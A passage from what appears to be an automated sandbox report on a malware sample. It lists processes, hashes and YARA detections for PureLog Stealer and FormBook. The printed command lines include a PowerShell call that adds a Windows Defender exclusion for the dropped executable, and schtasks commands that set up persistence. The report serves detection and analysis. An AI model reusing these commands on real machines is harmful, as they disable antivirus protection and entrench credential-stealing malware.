                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"
                          Imagebase:0x1000000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"
                          Imagebase:0xab0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:01:56:52
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:01:56:53
                          Start date:18/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0x870000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:01:56:54
                          Start date:18/07/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff717f30000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:01:56:55
                          Start date:18/07/2024
                          Path:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                          Imagebase:0x1e0000
                          File size:807'432 bytes
                          MD5 hash:9C2717586122DB3E57BA56513F66E1B8
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 66%, ReversingLabs
                          • Detection: 48%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          Target ID:11
                          Start time:01:57:02
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"
                          Imagebase:0xab0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:01:57:02
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:01:57:02
                          Start date:18/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Imagebase:0xcc0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:01:57:22
                          Start date:18/07/2024
                          Path:C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe"
                          Imagebase:0x3e0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:16
                          Start time:01:57:24
                          Start date:18/07/2024
                          Path:C:\Windows\SysWOW64\runas.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\runas.exe"
                          Imagebase:0x880000
                          File size:17'920 bytes
                          MD5 hash:13646BC81C39130487DA538B2DED5B28
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          Target ID:19
                          Start time:01:58:05
                          Start date:18/07/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff728280000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true
